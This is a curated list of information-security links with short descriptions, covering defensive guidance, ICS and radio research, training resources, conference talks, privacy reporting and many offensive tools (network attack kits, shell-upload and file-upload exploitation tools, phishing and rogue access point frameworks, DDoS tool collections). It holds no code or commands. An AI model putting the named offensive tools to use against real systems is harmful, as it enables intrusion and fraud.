• Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. nuclei-templates: Community curated list of templates for the nuclei engine to find a security vulnerability in application.
  • Nuclei unleashed - writing first exploit
• Secure design principles
• Risk Assessment of GitHub Copilot
• ISA/IEC 62443
• Understanding IEC 62443
• NERC CIP
• Threat Modeling Manifesto
• hcltm: Documenting your Threat Models with HCL.
• Risk Management Framework for Systems and Organizations Introductory Course

Guidelines

• NIST Special Publication 800-63B: Digital Identity Guidelines
• Easy Ways to Build a Better P@$5w0rd
• Time for Password Expiration to Die
• Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events

ICS (SCADA)

• GRASSMARLIN: Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments.
• ATT&CK® for Industrial Control Systems
• THE RACE TO NATIVE CODE EXECUTION IN PLCS
• The Top 20 Secure PLC Coding Practices Project
• Synchrophasor
  • IEEE C37.118.1-2011 - IEEE Standard for Synchrophasor Measurements for Power Systems
  • Measuring relays and protection equipment - Part 118-1: Synchrophasor for power systems - Measurements
  • IEEE C37.118 protocol
  • IEEE C37.118 Synchrophasor Protocol - wireshark wiki
• INFRA:HALT: Forescout Research Labs and JFrog Security Research discover 14 new vulnerabilities affecting closed source TCP/IP stack NicheStack, allowing for Denial of Service or Remote Code Execution primarily affecting operational technology (OT) and industrial control system (ICS) devices.
• Findings From Examining More Than a Decade of Public ICS/OT Exploits
• The Top 20 Secure PLC Coding Practices Project
• Conpot: ICS/SCADA honeypot.
• Hello_Proto: "Banner Grabbing" en entornos industriales.

Radio

• Qualcomm chain-of-trust
• Presenting QCSuper: a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones. github
• Logitech keyboards and mice vulnerable to extensive cyber attacks
• A look at GSM
• The gr-gsm project: Gnuradio blocks and tools for receiving GSM transmissions.
• srsLTE: Open source SDR LTE software suite from Software Radio Systems (SRS)
• List of software-defined radios
• Spectrum Analyzers, Linux
  • Sonic Visualiser:
  • spek. repo
  • SpectMorph: is a free software project which allows to analyze samples of musical instruments, and to combine them (morphing).
• The LibreCellular project aims to make it easier to create 4G cellular networks with open source software and low cost software-defined radio (SDR) hardware.
• RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.

Satellite

• How Do I Crack Satellite and Cable Pay TV? (33c3)
  • Capture data from QPSK-demodulated OOB bitstream with Saleae logic analyzer and output byte stream.
  • Process QPSK-demodulated data into transport stream (SCTE 55-1)

Social Engineering

• Cartero: Social Engineering Framework
• The Basics of Social Engineering by Chris Pritchard on DEF CON 27. Books suggested:
  • Never Split Difference - Chris Voss
  • The Carisma Myth - Olivia Fox Cabane
  • Hacking the Human - Ian Mann
  • The Art Of Social Engineering - Chris Hadnagy
  • What Everybody is Saying - Joe Navarro
• The Social-Engineer Toolkit (SET): repository from TrustedSec - All new versions of SET will be deployed here.

Tools

• Network Security Monitoring on Raspberry Pi type devices
• A secure, shared workspace for secrets
• bettercap, the Swiss army knife for network attacks and monitoring.
• Quijote is an highly configurable HTTP middleware for API security.
• Tool Analysis Result Sheet and guide, via Detecting Lateral Movement through Tracking Event Logs by jpcertcc
• EKOLABS tools repo
• Vapor PwnedPasswords Provider: Package for testing a password against Pwned Passwords V2 API in Vapor
• Is my password pwned?, bash script
• XPoCe - XPC Snooping utilties for MacOS and iOS (version 2.0)
• Enterprise Password Quality Checking using any hash data sources (HaveIBeenPwned lists, et al)
• DockerAttack: Various Tools and Docker Images
• PyREBox is a Python scriptable Reverse Engineering sandbox
• find3: High-precision indoor positioning framework, version 3
• structured-text-tools: A list of command line tools for manipulating structured text data
• telnetlogger: Simulates enough of a Telnet connection in order to log failed login attempts.
• vault: A tool for secrets management, encryption as a service, and privileged access management
• WeakNet LINUX 8: This is an information-security themed distribution that has been in development since 2010.
• HiTB: It was a part of HackTheBox platform.
• arphid: DYI 125KHz RFID read/write/emulate guide
• Pybelt: The hackers tool belt
• mhax
• U2F Support Firefox Extension
• git-bug: Distributed bug tracker embedded in Git
• mkcert: A simple zero-config tool to make locally trusted development certificates with any names you'd like
• trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
• Polymorph is a real-time network packet manipulation framework with support for almost all existing protocols
• query_huawei_wifi_router: A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc
• kravatte: Implementation of Kravatte Encryption Suite
• noisy: Simple random DNS, HTTP/S internet traffic noise generator
• PatternAnalyzer: The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.
• Google Chromium, sans integration with Google
• Gammux: A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images.
• openvotenetwork: Implementation of anonymous Open Vote Network in go
• put2win: Script to automatize shell upload by PUT HTTP method to get meterpreter
• Tools by Morphus Labs
• Stratosphere IPS
• Convert nmap Scans into Beautiful HTML Pages
• NMapGUI: Advanced Graphical User Interface for NMap
• GeoInt
• python-nubia: A command-line and interactive shell framework.
• nipe: is a script to make Tor Network your default gateway.
• fuxploider: File upload vulnerability scanner and exploitation tool.
• solo: FIDO2 USB+NFC token optimized for security, extensibility, and style
• Joint Report On Publicly Available Hacking Tools: by Canadian Centre for Cyber Security.
• APTSimulator: A toolset to make a system look as if it was the victim of an APT attack
• debugger-netwalker: NetWalker Debugger
• USB armory: open source flash-drive-sized computer
• Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
• Big List of Naughty Strings
• Netflix Cloud Security SIRT releases Diffy: A Differencing Engine for Digital Forensics in the Cloud - diffy repo.
• Command-Line Snippets: A place to share useful, one-line commands that make your life easier.
• IP-to-ASN - Team Cymru
• 4nonimizer: A bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN).
• free Entropy Service.
• Correct Horse Battery Staple: Secure password generator to help keep you safer online. code
• CorrectHorse: random secure password generator.
• XKCD-password-generator: Generate secure multiword passwords/passphrases, inspired by XKCD
• Using a Hardened Container Image for Secure Applications in the Cloud
• freedomfighting: A collection of scripts which may come in handy during your freedom fighting activities.
• Machine Learning and Security: Source code about machine learning and security.
• octofairy: A machine learning based GitHub bot for Issues.
• kbd-audio: Tools for capturing and analysing keyboard input paired with microphone capture
• certstreamcatcher: This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks.
• Wifiphisher: is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.
• chezmoi: Manage your dotfiles securely across multiple machines.
• hexyl: A command-line hex viewer.
• Giggity: Wraps github api for openly available information about an organization, user, or repo.
• howmanypeoplearearound: Count the number of people around you by monitoring wifi signals .
• LASCAR: Ledger's Advanced Side-Channel Analysis Repository.
• Hostintel: A Modular Python Application To Collect Intelligence For Malicious Hosts - github
• DarkNet_ChineseTrading
• mXtract: Memory Extractor & Analyzer.
• commando-vm: a fully customized, Windows-based security distribution for penetration testing and red teaming.
  • commando packages
• Introducing Inkdrop 4
• AntiCheat-Testing-Framework: Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal).
• IronPython, darkly: how we uncovered an attack on government entities in Europe
• inlets: Expose your local endpoints to the Internet
• Papers released by the Intelstorm Teampapers
• Pwnagotchi: (⌐■_■) - Deep Reinforcement Learning vs WiFI
• spyse.py: Python API wrapper and command-line client for the tools hosted on spyse.com.
• Cloning a MAC address to bypass a captive portal
• Open Steno Project was founded by stenographer Mirabai Knight as a reaction to the closed down, proprietary nature of the court reporting industry.
• Machine Learning on Encrypted Data Without Decrypting It
• 0bin: Client side encrypted pastebin.
• Raspberry pi as poor man’s hardware hacking tool
• usbkill: is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.
• gs-transfer: Secure File Transfer via Global Socket Bounce Network.
• CORE: The Common Open Research Emulator (CORE) is a tool for emulating networks on one or more machines.
• VoightKampff: Beating Google ReCaptcha and the funCaptcha using AWS Rekognition.
• John the Ripper in the cloud: John the Ripper jumbo supports hundreds of hash and cipher types.
• SpamCop is the premier service for reporting spam.
• vector-edk: EFI Development Kit.
• H1R0GH057: tools (DDoS, lulz, etc..)
• gatekeeper: First open-source DDoS protection system
• uriDeep: Unicode encoding attacks with machine learning
• Rawsec's CyberSecurity Inventory: An inventory of tools and resources about CyberSecurity.
• gaijin tools
• Lord Of The Strings (LOTS): String extraction and classification tool for binary files, designed to extract only the strings that can be considered relevant (i.e. not garbage or false positives)
• Unit 42 Public Tools Repo: Listing of tools released by Palo Alto Networks Threat Intelligence team.
• glsnip: copy and paste across machines
• CERTrating is the first tool to assess the Maturity Level of CERTs and their services. News: CERTrating a new Tool to evaluate CERT/CSIRT maturity level
• Cybersecurity Maturity Model Certification (CMMC)
• What is the Cybersecurity Maturity Model Certification (CMMC)
• Who needs to have Cybersecurity Maturity Model Certification (CMMC)
• Security Tools: Most of the links listed here goes to the original sites.
• Find Virtual Hosts for Any IP Address
• ngrok: Introspected tunnels to localhost
• cppngrok: a cpp wrapper for ngrok (WIP)
• Pybull: Contains some cool python projects. It is 100% python coded. Have fun see_no_evil
• dfss: Daemon for sense of security. Shutdown or reboot your computer, like a "USBKILL".
• Gamifying machine learning for stronger security and AI models: CyberBattleSim: An experimentation and research platform to investigate the interaction of automated agents in an abstract simulated network environments.
• BashScan: is a port scanner built to utilize /dev/tcp for network and service discovery on systems that have limitations or are otherwise unable to use alternative scanning solutions such as nmap.
• python-libnessus: Python Nessus Library - libnessus is a python library to enable devs to chat with nessus XMLRPC API, parse, store and diff scan results. It's wonderful.
• NFIQ2: Biometric fingerprint image quality assessment tool.
• Beta: Beta versions of Didier Stevens's software
• MaxMind ASN Importer: This is a script to import MaxMind ASN data into Tags (Host Groups) within Stealthwatch Enterprise, allowing for more granular tuning and identification of network flows.
• SubSeven is Back: The legendary SubSeven returns with a fan-made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required.
• Detect It Easy: Program for determining types of files for Windows, Linux and MacOS. DIE Engine
• Ronin is a free and Open Source Ruby toolkit for security research and development. Ronin contains many different CLI commands and Ruby libraries for a variety of security tasks, such as encoding/decoding data, filter IPs/hosts/URLs, querying ASNs, querying DNS, HTTP, scanning for web vulnerabilities, spidering websites, install 3rd party repositories of exploits and/or payloads, run exploits, write new exploits, managing local databases, fuzzing data, and much more.

Note-taking

• Awesome note-taking apps for hackers !
• SwiftnessX: A cross-platform note-taking & target-tracking app for penetration testers.
• cherrytree: A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file. repo
• cherrytree: A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file. repo
• SwiftnessX: A cross-platform note-taking & target-tracking app for penetration testers.
• [trilium]https://github.com/zadam/trilium): Build your personal knowledge base with Trilium Notes.
• obsidian: is a powerful knowledge base that works on top of a local folder of plain text Markdown files.
• CudaText, repo
• marktext: A simple and elegant markdown editor, available for Linux, macOS and Windows.
• helix: A post-modern modal text editor.
• Compare AsciiDoc and Markdown

Kali

• hurl: hexadecimal & URL encoder + decoder. Package Description: hURL is a small utility that can encode and decode between multiple formats.
• Kali Tools

IP Reputation

• IP Reputation Check
• IP & Domain Reputation Center

Shell tools

• Python-Scripts: some scripts for penetration testing.
• SubEnum: bash script for Subdomain Enumeration
• password-store: Simple password manager using gpg and ordinary unix directories.

Search Engines

• DarkSearch: The 1st real Dark Web search engine (Darksearch vs Ahmia)
• Search engines for Hackers:
  • censys.io
  • shodan.io
    • TriOp: Tool for quickly gathering statistical information from Shodan.io repo
  • viz.greynoise.io
  • zoomeye.org
  • wigle.net
  • publicwww.com
  • hunter.io
  • haveibeenpwned.com
  • haveibeenEMOTET
  • thispersondoesnotexist.com
  • osintframework.com
  • NAPALM FTP Indexer lets you search and download files located on public FTP servers. The most advanced FTP Search Engine service maintained by members.
• Insecam: Network live IP video cameras directory.

VPN

• jigsaw project by Alphabet/Google. Outline: VPN Server.
• SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
• WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
• Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
• Sputnik -An Open Source Intelligence Browser Extension
• PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
• uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
• Nefarious LinkedIn: A look at how LinkedIn spies on its users.
• ProtonVPN-CLI: Linux command-line client for ProtonVPN. Written in Python.
• Nebula: A scalable overlay networking tool with a focus on performance, simplicity and security. Introducing Nebula
• AirVPN A VPN based on OpenVPN and operated by activists and hacktivists in defence of net neutrality, privacy and against censorship.
• Build your own private WireGuard VPN with PiVPN.

Secure Sharing

• CryFS: Keep your data safe in the cloud. code
• Cryptomator: Multi-platform transparent client-side encryption of your files in the cloud. code
• VeraCrypt: is a free open source disk encryption software for Windows, Mac OSX and Linux.
• CipherShed: is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs). code
• Boxcryptor: Security for your Cloud.
• Nextcloud E2E: End-to-end encryption RFC. Some old news about it
• DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. code
• ProjectSend is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!
• Mozilla send: Simple, private file sharing from the makers of Firefox (archived). Revival: send

Privacy

• Apple: Device and Data Access when Personal Safety is At Risk
• Everything Old is New Part 2: Why Online Anonymity Matters
• Data Security on Mobile Devices: Current State of the Art, Open Problems, and Proposed Solutions.
• Breach alert: on Apr 7th -based fintech IUGU exposed its entire database, incl. ALL customers and account details: emails, phones, addresses, invoices etc. IP with 1.7TB indexed by Shodan, I immediately alerted the company, db was taken down within an hour. No response.
• TorBox Wireless Manager
• Anyone can use this powerful facial-recognition tool — and that's a problem
• The Instagram ads Facebook won't show you
• Yggdrasil: An experiment in scalable routing as an encrypted IPv6 overlay network.
• Receiving sensitive information about any Dodo pizzeria
• 4TB of stolen identities are being circulated online following a breach on Oriflame
• Using “Master Faces” to Bypass Face-Recognition Authenticating Systems, Generating Master Faces for Dictionary Attacks witha Network-Assisted Latent Space Evolution, two other news
• apollo: A Unix-style personal search engine and web crawler for your digital footprint.
• Forensic Methodology Report: How to catch NSO Group’s Pegasus
• Who is being monitored?: Politicians regularly claim that they need to ban encryption to protect the children. But who is actually being monitored?
• How to choose a browser for everyday use?, E-mail providers - which one to choose? and Search Engines - which one to choose?
• TrackerControl: monitor and control trackers and ads.
• Disinformation guru “Hacker X” names his employer: NaturalNews.com
• Hey Siri, Find My Ex: Tech-Enabled Abuse in the Apple Ecosystem.
• Keyhole Imaging
• Your Roomba May Be Mapping Your Home, Collecting Data That Could Be Shared
• Global Presence of Authoritarian Tech
• Zooming in on Zero-click Exploits

General

• Explain Shell
• Examples of regular expressions
• A tcpdump Tutorial and Primer with Examples
• Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
• A curated list of awesome Threat Intelligence resources
• Looking for value in EV Certificates
• How to find hidden cameras
• the Simple Encrypted Arithmetic Library (SEAL): This repository is a fork of Microsoft Research's homomorphic encryption implementation
• Cupcake: A Rust library for lattice-based additive homomorphic encryption.
• Our latest updates on Fully Homomorphic Encryption repo
• A port of ChibiOS to the Orchard radio platform
• Decent Security: Everyone can be secure.
• Introducing Certificate Transparency and Nimbus
• trillian: Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees.
• CFSSL's CA trust store repository
• A Few Thoughts on Cryptographic Engineering
• Mailfence
• Threat Hunting Workshop - Methodologies for Threat Analysis
• Xoodoo
• CoPilot is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings.
• AgentMaps: Make social simulations on interactive maps with Javascript!
• flowsscripts: Miner pools ips.
• SwiftFilter: Exchange Transport rules to detect and enable response to phishing
• The Illustrated TLS Connection: Every Byte Explained and The New Illustrated TLS Connection
• Practical Cryptography
• Thieves and Geeks: Russian and Chinese Hacking Communities
• ephemera-miscellany: Ephemera and other documentation associated with the 1337list project.
• CleverHans: An adversarial example library for constructing attacks, building defenses, and benchmarking both
• HTTP/3 Explained - github/http2 explained - github
• security: Discussion area for security aspects of ECMAScript
• Template for Data Protection Impact Assessment (DPIA)
• hash collisions exploitation and other pocs, a script to collide PDFs
• Shodan - A tool for Security and Market Research
• Engineering Security: general book about a range of topics in security.
• (ru) Плакаты по информационной безопасности Российской армии: Russian counter information posters.
• Kerberos (I): How does Kerberos work? – Theory
• Vulncode-DB project: The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available.
• One-End Encryption (OEE): Stronger than End-to-End Encryption
• Automatic SSL with Now and Let's Encrypt
• Hacking Digital Calipers
• Binary Hardening in IoT products: Last year, the team at CITL looked into the state of binary hardening features in IoT firmware.
• ZigDiggity: A ZigBee hacking toolkit by Bishop Fox.
• Bolstering Security with Cyber Intelligence
• Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties
• THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS
• Explanatory Reportto the Additional Protocol to the Convention on Cybercrime
• PAN-OS GlobalProtect Portal Scanner: Determine the Palo Alto PAN-OS software version of a remote GlobalProtect portal or management interface.
• Thomas Roccia's #100DaysOfCode challenge: IDA pro and a lot of another things.
• Audi A7 2014 MMI Mishandles the Format-string Specifiers
• (pt-br) BoF + Sockets + Erros de Codificação com o Python3
• Yet another SIP003 plugin for shadowsocks, based on v2ray: A SIP003 plugin based on v2ray
• Information Security related Mind Maps
• List of Rainbow Tables
• Do you hear what I hear? A cyberattack.: CyLab’s Yang Cai is turning network traffic data into music.
• Ghost in the ethernet optic: A few months ago I stumbled on a tweet pointing out a kind of SFP optic that claimed to be smart, made by a Russian company Plumspace.

Configs

• Kali-Customizations

---

Resources

• 13 Best New Software Security Books To Read In 2021
• pwn.college is a first-stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect”.
• 'pwnable.kr' is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. the main purpose of pwnable.kr is 'fun'.
• Pwnable.tw is a wargame site for hackers to test and expand their binary exploiting skills.
• Security Zines: graphical way of learning concepts of Application & Web Security.

Training and Certifications

• OSWE: OSWE Preparation.
• AWAE/OSWE: Preparation for coming AWAE Training.
• AWAE-PREP: This repository will serve as the "master" repo containing all trainings and tutorials done in preperation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses.
• offsec_WE: learning case to prepare OSWE
• AWAE-Preparation: This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE.
• From AWAE to OSWE: The Preperation Guide
• Awesome Infosec: A curated list of awesome infosec courses and training resources.
• Security Certification Progress Chart
• study material used for the 2018 CISSP exam, site
• JustTryHarder: a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings).
• Hacking Your Pen Testing / Red Teaming Career: Part 1
• PentesterAcademy: Courses and Online Labs.
• OSCE-exam-practice, OSCE Exam Practice - Part IX (LTER via SEH Overwrite w/ Restricted Character Set)
• RED TEAM Operator: Malware Development Essentials Course and RED TEAM Operator: Malware Development Intermediate Course
• OSCP Journey
• Hacking Dojo
• Learning from your mistakes as an offensive security professional
• Burp Suite Academy
• The Ultimate List of SANS Cheat Sheets
• Posters: Pen Testing
• #OSCP exam advice thread.
• Targeted Malware Reverse Engineering Workshop
• OpenSecurity: We do quality pentests, security engineering, security training and we ♥ OpenSource.
• OPSEC: In Theory and Practice: Learn OPSEC through historical examples. This introductory course covers OPSEC concepts, theory, and application. You will learn how to critically assess security advice, and how to differentiate between good and bad OPSEC.
• opsec: Counter Surveillance and OPSEC research.
• Guide-CEH-Practical-Master
• Understand Kerberos Delegation, Active Directory Security Descriptors, Windows Lateral Movements, etcc.
• Free Incident Response Training Plan and Part 2: Free Training Plan for New Incident Responders. BaselineTraining: Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk.
• CyberDefenders is a training platform focused on the defensive side of cybersecurity, aiming to provide a place for blue teams to practice, validate the skills they have, and acquire the ones they need.
• (pt-br) OSCP — Meu caminho até a terra prometida.
• psylinux
• How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
• SOC Core Skills w/ John Strand
• awesome-cyber-skills: A curated list of hacking environments where you can train your cyber skills legally and safely.

Conferences and Slides

• H2HC - Hackers To Hackers Conference:
  • H2HC 2017: H2HC 2017 Slides/Materials/Presentations
  • H2HC 2018: Slides/Materials/Presentations
  • JavaDeserH2HC: Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).
  • H2HC 2021
• CCC:
  • Modchips of the State: Hardware implants in the supply-chain - CCC 2018
• BlackHat:
  • 2014 Keynote: Cybersecurity as Realpolitik, amazing keynote by Dan Geer (Geertinho)
  • Kudelski Security's 2018 pre-Black Hat crypto challenge
  • 2018: Expert demonstrated a new PHP code execution attack
  • 2021:
    • supply chain issues talk
    • MFA-ing the Un-MFA-ble: Protecting Auth Systems' Core Secrets. tal be'ery
• DEFCON:
  • 2018: Doublethink: 8-Architecture Assembly Polyglot by Robert Xiao
  • 2020: SAFEMODE, VILLAGES, BADGE, ics-forum
  • 2021:
    • OpenSOC Blue Team CTF @ DEFCON 29 FAQ
    • Using Barq to perform AWS Post-Exploitation Actions Terraform hacking talk
• SBSeg 2018: Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (SBSeg)
• Objective by the Sea (2018):
  • APFS Internals - Jonathan Levin
  • Protecting the Garden of Eden - Patrick Wardle
  • Code signing flaw in macOS - Thomas Reed
  • From Apple Seeds to Apple Pie - Sarah Edwards
  • When Macs Come Under ATT&CK - Richie Cyrus
  • Crashing to Root - Bradon Azad
  • Leveraging Apple's Game Engine for Advanced Threat Detection - Josh Stein / Jon Malm
  • MacDoored - Jaron Bradley
  • Who Moved my Pixels? - Mikahail Sosonkin
  • Aliens Among Us - Michael Lynn
• BlackHoodie 2018 Workshop: An Introduction To Binary Exploitation
• r2con2020 stuff
  • workshop: semi-automatic code deobfuscation
  • r2con2020 DAY3 Live Stream
• hack.lu:
• MISP Summit 05: MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone.
• Hack.lu 2019 Day #1 Wrap-Up
• The Open Source Security Software Hackathon
• Hack.lu 2021 Stonks Socket
• How to R&D hacking toys for fun & no-profit
• Security Guidelines for Congressional Campaigns
• From Assembly to JavaScript and back (OffensiveCon2018)
• ARM-based IoT Exploit Development
• (pt-br)Uma Introdução a Threat Intelligence e Threat Hunting para Empresas Sem Orçamento Infinito
• Outflank Presentations
• The Art of De-obfuscation
• Smartphone Privacy: How Your Smartphone Tracks Your Entire Life
• Fun with LDAP and Kerberos- in AD environments
• Analysis and recommendations for standardization in penetration testing and vulnerability assessment
• The Second Crypto War—What's Different Now (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University)
• Malware: Anti-forensics
• The 35C3 halfnarp
• SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
• Mojave's Sandbox is Leaky
• Code Obfuscation 10**2+(2*a+3)%2
• DeepState: Bringing vulnerability detection tools into the development lifecycle, paper: DeepState: Symbolic Unit Testing for C and C++
• Hardware Memory Tagging to make C/C++ memory safe(r)
• wallet.fail: Hacking the most popular cryptocurrency hardware wallets
• Reverse Engineering: Closed, heterogeneous platforms and the defenders’ dilemma Looking back at the last 20 years of RE and looking ahead at the next few SSTIC 2018 -- Thomas Dullien (“Halvar Flake”)
• Making C Less Dangerous in the Linux kernel
• Workshop-BSidesMunich2018: ARM shellcode and exploit development - BSidesMunich 2018
• REhint's Publications.
• INFILTRATE 2019 Demo Materials
• A Practical Approach to Purple Teaming
• The Advanced Threats Evolution: REsearchers Arm Race by @matrosov
• The Beginner Malware Analysis Course + VirusBay Access
• ConPresentations by Maddie Stone.
• Venturing into the Dark- a review of Dark Side Ops 2: Adversary Simulation
• Expert voices disinvited from CyberCon
• 0x0g-2018-badge.
• Virtual Cybersecurity Conferences: An ongoing list of virtual cybersecurity conferences.
• The speaker and schedule data for GrayHat to populate Hacker Tracker and the main GrayHat website.
• Offensive Development: Post-Exploitation Tradecraft in an EDR World x33fcon 2020
• WebSploit Labs workshop hosted by the Red Team Village during YASCON
• The AVAR International Conference is back!
• Japan Security Analyst Conference Virtual Edition
• {baby,mama,gran}-a-fallen-lap-ray DEFCON 2021 Quals
• Developing Secure Systems Summit (DS3): The state of the art in developing secure computer systems is advancing rapidly, with progress in several communities around the world spanning the software industry, academia, research labs, and governments.
• MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE HITBSecConf2019 -Amsterdam
• PoC demo for HITB Amsterdam 2021: Playing hide-n-seek with AWS GuardDuty: Post-DNS era covert channel for C&C and data exfiltration.
• Securing Cyber-Physical Systems: moving beyond fear
• Speaking materials from conferences by Tim Scythe
• TheGlasshouseCtr
• Open Source Security Day on Google Open Source Live
• hardik05: My conference presentations and Materials for them.
• 30th USENIX Security Symposium
• The Hijackers Guide to the Galaxy:Off-path Taking over Internet Resources

Sans

• Quiz:
  • April 2021 Forensic Quiz repo
  • May 2021 Forensic Contest repo answer
  • June 2021 Forensic Contest, June-2021-forensic-quiz Network Forensics on Azure VMs (Part #2).
• Quick Analysis of a Modular InfoStealer
• Example of Cleartext Cobalt Strike Traffic
• SEC642 papers: This repository is a collection of papers used in the course that has been deprecated on the wide internet.
• "Serverless" Phishing Campaign
• SANS CTI Summit 2021
• SANS Virtual Summits Will Be FREE for the Community in 2021
• Random Forests: Still Useful?

psyops

• Read the Pentagon’s 20-Page Report on Its Own Meme
• Bezmenov’s Steps (Ideological Subversion)
• PAUL LAZARSFELD—THE FOUNDER OF MODERN EMPIRICAL SOCIOLOGY: A RESEARCH BIOGRAPHY
• Influence Operations 101 - Media Effects video
• Hazard Mapping: The information architecture of ethics, a draft proposal
• Cognitive Warfare

---

Sources

Some good places to visit:

• hasherezade's 1001 nights
  • How to start RE/malware analysis? | hasherezade's 1001 nights
• List of Helpful Information Security Multimedia
• pocorgtfo: a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs.
• FIDO ECDAA Algorithm
• stamparm: Miroslav Stampar Repositories (a lot of good stuff)
• Github repos:
  • gabrielmachado
• Damn Vulnerable Web Application:
  • Damn Vulnerable Web Application Docker container
  • Damn Vulnerable Web Application (DVWA)
  • Damn Vulnerable C Program: a c program containing vulnerable code for common types of vulnerabilities, can be used to show fuzzing concepts.
• vvmlist: vulnerable virtual machine list is a list of vulnerable vms with their attributes.
• Nelson Brito's Source: This repository is a collection of information, code and/or tool, which I've released and/or presented in some of the most notorious conferences, helping the audience to study and understand some cybersecurity related topics.
• (pt-br)PwnLab: init
• Mamont's open FTP Index: a lot of open FTPs!!!
• fuzz.txt: Potentially dangerous files
• Free Training: New Certified Learning Paths: The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings!
• (pt-br)Catálogo de Fraudes: Lançado em 2008 para alertar a comunidade de ensino e pesquisa sobre os principais golpes em circulação na internet, o nosso Catálogo de Fraudes é hoje um repositório importante de mensagens classificadas como fraudulentas, que serve como fonte de informação para todo o Brasil.
• Daily Information Security Podcast ("StormCast")
• Hackerrank: Contains codes for some of the solutions to Hacker-rank problems
• I may have found Omega Weapon: One Powerful, Terrifying Monster Forming the Upper Reaches of Another, Much More Powerful & Terrifying Monster. #CyberpunkisNow is a project producing Digital Privacy/Anonymity, Counter-Surveillance, Hacking, Technology, Information Security/Cyber Security, Science & Open Source Intelligence content meant to educate, establish/maintain a public dialogue & create awareness regarding the ways technology continues to permeate civilization.
• Exodus Research Community
• 2021 Annual Threat Assessment of the us intelligence community.
• Hamid's Bookmarks
• DARKNET DIARIES: EP 67: THE BIG HOUSE
• Wrong Secrets: Examples with how to not use secrets.
• Vulnserver: Vulnerable server used for learning software exploitation.

---

Fun

• Spoilerwall introduces a brand new concept in the field of network hardening
• abusing github commit history for the lulz
• resist_oped: 🕵🏽‍♀️ Identifying the author behind New York Time’s op-ed from inside the Trump White House.
• InfoSec BS Bingo
• How to fit all of Shakespeare in one tweet (and why not to do it!)
• Attrition.org: defacement rank.
• rot8000: rot13 for the Unicode generation (github)
• Reverse Engineering Pokémon GO Plus: TL;DR; You can clone a Pokemon GO Plus device that you own. pgpemu: github repo.
• grugq quotes
• Pivots & Payloads Board Game: Introducing the NEW SANS Pen Test Poster by SANS Institute
• Chess Steganography
• Enigma, the Bombe, and Typex
• (pt-br) Ícone da criptografia na 2ª Guerra Mundial, máquina Enigma tem exemplar no Brasil
• Enigma machine: This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit.
• How I hacked modern Vending Machines
• A better zip bomb
• Goodbye-World: The last program that every developer writes.
• Dumb Password Rules
• Enigma I, Navy M3/M4 Machine Emulator.
• FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases by Rob Rosenberger.
• (pt-br)pivoting offensivetools
• Posters, drawings...
